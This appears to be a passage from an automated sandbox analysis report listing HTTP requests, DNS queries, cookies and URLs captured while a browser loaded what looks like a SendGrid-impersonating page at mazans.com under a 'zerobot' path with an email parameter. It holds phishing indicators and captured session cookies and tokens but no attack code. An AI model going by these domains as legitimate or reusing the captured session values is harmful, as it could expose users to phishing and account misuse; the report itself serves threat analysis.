__qca=P0-2005580295-1731515356484; _clsk=1s9q9l2%7C1731515358678%7C1%7C0%7Cs.clarity.ms%2Fcollect; _hp2_ses_props.1541905715=%7B%22r%22%3A%22https%3A%2F%2Fsepedatua.com%2F%22%2C%22ts%22%3A1731515354042%2C%22d%22%3A%22mazans.com%22%2C%22h%22%3A%22%2FWEB-ID-6672849687924%2Fzerobot%2F%22%2C%22q%22%3A%22%3Femail%3DEMAIL_REDACTED%22%7D
    Source: global trafficHTTP traffic detected: GET /content/dam/sendgrid/core-assets/social/favicon-96x96.png HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTEDAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9; at_check=true; mbox=session#ead54cbe71824480b6163d2cf14e5e54#1731517211|PC#ead54cbe71824480b6163d2cf14e5e54.37_0#1794760151; _gcl_au=1.1.1581689275.1731515350; _gd_visitor=68a6beac-571c-486f-896d-0de3508c5af9; _gd_session=5109dfa4-7e15-4de3-89f4-70d06284fa1b; TAsessionID=57cd44ce-3945-49f8-b363-1f9e5ecbe175|NEW; notice_behavior=implied,eu; _cq_duid=1.1731515352.vVOwxXK4AgFUHCBp; _cq_suid=1.1731515352.purk0nRGidINit9L; _mkto_trk=id:294-TKB-300&token:_mch-mazans.com-1731515352683-23262; _an_uid=0; _ga_8W5LR442LD=GS1.1.1731515352.1.0.1731515352.0.0.0; _ga=GA1.1.70095159.1731515353; _rdt_uuid=1731515353676.59612d52-27d8-4d62-91ae-7a523b33ca67; _hp2_id.1541905715=%7B%22userId%22%3A%226112782573225535%22%2C%22pageviewId%22%3A%222199469863289764%22%2C%22sessionId%22%3A%225313631937644667%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D; _uetsid=6c20c730a1dc11ef92b555071f46574f; _uetvid=6c2123d0a1dc11ef9ad55fff4e91da09; ajs_anonymous_id=a6484a29-d020-4de6-a9ba-3d1267788ab8; _fbp=fb.1.1731515356382.644741780521606255; _cs_c=0; _cs_id=392b47b9-fdc5-a91a-dc6e-b9b5c392f625.1731515356.1.1731515356.1731515356.1728518226.1765679356523.1; _cs_s=1.0.0.9.1731517156537; _ga_8W5LR442L=GS1.1.1731515356.1.0.1731515356.0.0.0; _clck=1aw3k49%7C2%7Cfqu%7C0%7C1778; __qca=P0-2005580295-1731515356484; _clsk=1s9q9l2%7C1731515358678%7C1%7C0%7Cs.clarity.ms%2Fcollect; _hp2_ses_props.1541905715=%7B%22r%22%3A%22https%3A%2F%2Fsepedatua.com%2F%22%2C%22ts%22%3A1731515354042%2C%22d%22%3A%22mazans.com%22%2C%22h%22%3A%22%2FWEB-ID-6672849687924%2Fzerobot%2F%22%2C%22q%22%3A%22%3Femail%3DEMAIL_REDACTED%22%7D
    Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bspA476fsYy55S4&MD=WXEEmc47 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
    Source: global trafficHTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -300X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=300; StandardBias=0; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAZ9wFy4prAXDotaSkjc8ffAiUyEj64CQlxVeaR9qcW7MT11UX1XM//U6xk7zg85MnS/VYq12XqBiLIJS04X13LOtiX5o9CvJS/eIGVIMh2Dx27rTmSLkvIDyfYlXAGfUSYLpzb3N81Sp7msx7v1gOwbzvZE4v85HuSmeUUled9wIRwjU2G8Xz4GXdiGe9yt8n5WAncovn/pkUEcDePMQ4g%2BC857zTgEEwMYQjfjWE1TrSsYzA%2B/cviLxh8uEHO/mvkNehdUvmW43r9456sgNjkS4ktSjywc7Lx5G9/QsSUky1RzdipdNtjuLML8n6WEW3AWXnE%2B6wNYTpHWPWpqa8ywQZgAAEPJnAZc3PSJ//mrFg6dnTMywAUKR1cLcuvv1Q/RHF/B25hy3ktknCm9NUsR1AhtEf7eoU196JGOJJg40Wam%2BxZpmt0GG5ibLf/nD3s1f5CCQsbU4l2DdHTJF89GkL4T3%2BCNzNTQlIqml7BSNDJocd4plQGCE8CQfBbjCO8E67Q%2BtZK4O2DatdgGac6P6/BLDr03XnfW0jZ8WnMD0H2Rn5hOEcJuA%2B%2B%2BWUr1K/eFt5XRU%2BfEXG8TB6UD1wFXW4Cn4rBJ0GI2WyRsnTwCaKjIWIgq7RYjCm7/N%2BttB2I/gwVbx9i4fpAYYRseMv/ZBenN37hX74CgM4qHctFZXgrbTJVgpSpeXCtgYmNCkJW3Kpb3dM3Ph9EW9ndW4Z7yMFsVK5dIVEJ5T%2BJO3PWgNdp9scL28L2dozVqWNivlAvGycP/cHK3R6B6PcQPZdB%2BEvGt6xIEcM8443YBFSAC77Q7DHQ9NmXWyLeG0cZAw%2BACmjP90mTy2eGNTtAUcksViqbEcoaM16L9YQgRcL7CHu%2B4qH3DGKJPqGRIbsgm7VNwtMGad4xcfk8umpW9EvHSYIDMKth4c6e8/5cSnLu6Nht55Plu20NoB%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1731515398User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 7F9AC86BFC3645F1AA7A60F77D753DABX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
    Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: chromecache_353.7.drString found in binary or memory: Math.round(q);t["gtm.videoElapsedTime"]=Math.round(f);t["gtm.videoPercent"]=r;t["gtm.videoVisible"]=u;return t},xk:function(){e=qb()},zd:function(){d()}}};var Zb=ma(["data-gtm-yt-inspected-"]),uD=["www.youtube.com","www.youtube-nocookie.com"],vD,wD=!1; equals www.youtube.com (Youtube)
    Source: chromecache_353.7.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={Ah:e,yh:f,zh:g,ii:k,ji:m,Qe:n,Ib:b},q=C.YT;if(q)return q.ready&&q.ready(d),b;var r=C.onYouTubeIframeAPIReady;C.onYouTubeIframeAPIReady=function(){r&&r();d()};F(function(){for(var u=E.getElementsByTagName("script"),v=u.length,t=0;t<v;t++){var w=u[t].getAttribute("src");if(FD(w,"iframe_api")||FD(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!wD&&DD(x[A],p.Qe))return pc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: r.neurotags.net
    Source: global trafficDNS traffic detected: DNS query: sepedatua.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: mazans.com
    Source: global trafficDNS traffic detected: DNS query: assets.adobedtm.com
    Source: global trafficDNS traffic detected: DNS query: cdn.segment.com
    Source: global trafficDNS traffic detected: DNS query: rum.hlx.page
    Source: global trafficDNS traffic detected: DNS query: twilio.tt.omtrdc.net
    Source: global trafficDNS traffic detected: DNS query: j.6sc.co
    Source: global trafficDNS traffic detected: DNS query: euob.powerrobotflower.com
    Source: global trafficDNS traffic detected: DNS query: consent.trustarc.com
    Source: global trafficDNS traffic detected: DNS query: snap.licdn.com
    Source: global trafficDNS traffic detected: DNS query: munchkin.marketo.net
    Source: global trafficDNS traffic detected: DNS query: secure.adnxs.com
    Source: global trafficDNS traffic detected: DNS query: c.6sc.co
    Source: global trafficDNS traffic detected: DNS query: ipv6.6sc.co
    Source: global trafficDNS traffic detected: DNS query: b.6sc.co
    Source: global trafficDNS traffic detected: DNS query: a.quora.com
    Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
    Source: global trafficDNS traffic detected: DNS query: cdn.heapanalytics.com
    Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
    Source: global trafficDNS traffic detected: DNS query: secure.quantserve.com
    Source: global trafficDNS traffic detected: DNS query: jscloud.net
    Source: global trafficDNS traffic detected: DNS query: www.redditstatic.com
    Source: global trafficDNS traffic detected: DNS query: q.quora.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.net
    Source: global trafficDNS traffic detected: DNS query: obseu.powerrobotflower.com
    Source: global trafficDNS traffic detected: DNS query: pixel-config.reddit.com
    Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: alb.reddit.com
    Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: t.contentsquare.net
    Source: global trafficDNS traffic detected: DNS query: rules.quantcount.com
    Source: global trafficDNS traffic detected: DNS query: www.clarity.ms
    Source: global trafficDNS traffic detected: DNS query: www.linkedin.com
    Source: global trafficDNS traffic detected: DNS query: w3-reporting-nel.reddit.com
    Source: global trafficDNS traffic detected: DNS query: api.segment.io
    Source: global trafficDNS traffic detected: DNS query: 294-tkb-300.mktoresp.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: pixel.quantserve.com
    Source: global trafficDNS traffic detected: DNS query: c.contentsquare.net
    Source: global trafficDNS traffic detected: DNS query: s.clarity.ms
    Source: global trafficDNS traffic detected: DNS query: heapanalytics.com
    Source: global trafficDNS traffic detected: DNS query: c.clarity.ms
    Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:10 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:13 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:24 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 16:29:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 07 Sep 2022 17:01:41 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
    Source: chromecache_307.7.dr, chromecache_342.7.dr, chromecache_347.7.drString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
    Source: chromecache_314.7.drString found in binary or memory: http://consent.trustarc.com/noticemsg?
    Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
    Source: chromecache_407.7.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: chromecache_353.7.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
    Source: chromecache_314.7.drString found in binary or memory: https://api-js-log.trustarc.com/error
    Source: chromecache_398.7.dr, chromecache_404.7.drString found in binary or memory: https://app.sendgrid.com/signup
    Source: chromecache_355.7.drString found in binary or memory: https://assets.adobedtm.com/a62564f453ce/3a3a2543ac65/launch-7021ca0c1852.js
    Source: chromecache_353.7.drString found in binary or memory: https://cct.google/taggy/agent.js
    Source: chromecache_356.7.dr, chromecache_384.7.drString found in binary or memory: https://cloud.google.com/contact
    Source: chromecache_356.7.dr, chromecache_384.7.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
    Source: chromecache_314.7.drString found in binary or memory: https://consent-pref.trustarc.com?type=sendgrid_gdpr_v3&layout=gdpr
    Source: chromecache_314.7.drString found in binary or memory: https://consent.trustarc.com/
    Source: chromecache_314.7.drString found in binary or memory: https://consent.trustarc.com/bannermsg?
    Source: chromecache_314.7.drString found in binary or memory: https://consent.trustarc.com/get?name=SurveyorSSm-LightItalic-Pro.otf)
    Source: chromecache_314.7.drString found in binary or memory: https://consent.trustarc.com/get?name=Whitney-Book.otf)
    Source: chromecache_314.7.drString found in binary or memory: https://consent.trustarc.com/get?name=Whitney-Light.otf)
    Source: chromecache_314.7.drString found in binary or memory: https://consent.trustarc.com/get?name=Whitney-Medium.otf)
    Source: chromecache_314.7.drString found in binary or memory: https://consent.trustarc.com/log
    Source: chromecache_356.7.dr, chromecache_384.7.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
    Source: chromecache_356.7.dr, chromecache_384.7.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
    Source: chromecache_356.7.dr, chromecache_384.7.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
    Source: chromecache_374.7.drString found in binary or memory: https://developers.marketo.com/MunchkinLicense.pdf
    Source: chromecache_345.7.drString found in binary or memory: https://github.com/microsoft/clarity
    Source: chromecache_353.7.drString found in binary or memory: https://google.com
    Source: chromecache_353.7.drString found in binary or memory: https://googleads.g.doubleclick.net
    Source: chromecache_331.7.drString found in binary or memory: https://j.6sc.co/6si.min.js
    Source: chromecache_335.7.drString found in binary or memory: https://jscloud.net/x/
    Source: chromecache_353.7.drString found in binary or memory: https://pagead2.googlesyndication.com
    Source: chromecache_353.7.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
    Source: chromecache_384.7.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
    Source: chromecache_407.7.drString found in binary or memory: https://rum.hlx.page
    Source: chromecache_390.7.dr, chromecache_330.7.drString found in binary or memory: https://segment.com
    Source: chromecache_398.7.dr, chromecache_404.7.drString found in binary or memory: https://sendgrid.com/
    Source: chromecache_398.7.dr, chromecache_404.7.drString found in binary or memory: https://sendgrid.com/?
    Source: chromecache_398.7.dr, chromecache_404.7.drString found in binary or memory: https://sendgrid.com/automated-email
    Source: chromecache_398.7.dr, chromecache_404.7.drString found in binary or memory: https://sendgrid.com/contact-us-form/
    Source: chromecache_398.7.dr, chromecache_404.7.drString found in binary or memory: https://sendgrid.com/marketing/sendgrid-services
    Source: chromecache_398.7.dr, chromecache_404.7.drString found in binary or memory: https://sendgrid.com/partners/amazon-web-services/
    Source: chromecache_398.7.dr, chromecache_404.7.drString found in binary or memory: https://sendgrid.com/solutions/email-marketing
    Source: chromecache_398.7.dr, chromecache_404.7.drString found in binary or memory: https://signup.sendgrid.com/
    Source: chromecache_353.7.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
    Source: chromecache_384.7.drString found in binary or memory: https://support.google.com/recaptcha
    Source: chromecache_356.7.dr, chromecache_384.7.drString found in binary or memory: https://support.google.com/recaptcha#6262736
    Source: chromecache_356.7.dr, chromecache_384.7.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
    Source: chromecache_356.7.dr, chromecache_384.7.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
    Source: chromecache_353.7.drString found in binary or memory: https://td.doubleclick.net
    Source: chromecache_398.7.dr, chromecache_404.7.drString found in binary or memory: https://threads.io/
    Source: chromecache_373.7.drString found in binary or memory: https://www.clarity.ms/tag/uet/
    Source: chromecache_353.7.drString found in binary or memory: https://www.google.com
    Source: chromecache_380.7.drString found in binary or memory: https://www.google.com/pagead/1p-user-list/923239173/?random
    Source: chromecache_356.7.dr, chromecache_384.7.dr, chromecache_328.7.drString found in binary or memory: https://www.google.com/recaptcha/api2/
    Source: chromecache_353.7.drString found in binary or memory: https://www.googleadservices.com
    Source: chromecache_353.7.drString found in binary or memory: https://www.googletagmanager.com
    Source: chromecache_353.7.drString found in binary or memory: https://www.googletagmanager.com/a?
    Source: chromecache_353.7.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
    Source: chromecache_356.7.dr, chromecache_384.7.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__.
    Source: chromecache_328.7.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js
    Source: chromecache_353.7.drString found in binary or memory: https://www.merchant-center-analytics.goog
    Source: chromecache_379.7.drString found in binary or memory: https://www.quantcast.com/legal/license
    Source: chromecache_314.7.drString found in binary or memory: https://www.twilio.com/en-us/legal/privacy
    Source: chromecache_314.7.drString found in binary or memory: https://www.twilio.com/en-us/legal/privacy#cookies-and-tracking-technologies
    Source: chromecache_314.7.drString found in binary or memory: https://www.twilio.com/en-us/legal/tos
    Source: chromecache_353.7.drString found in binary or memory: https://www.youtube.com/iframe_api
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
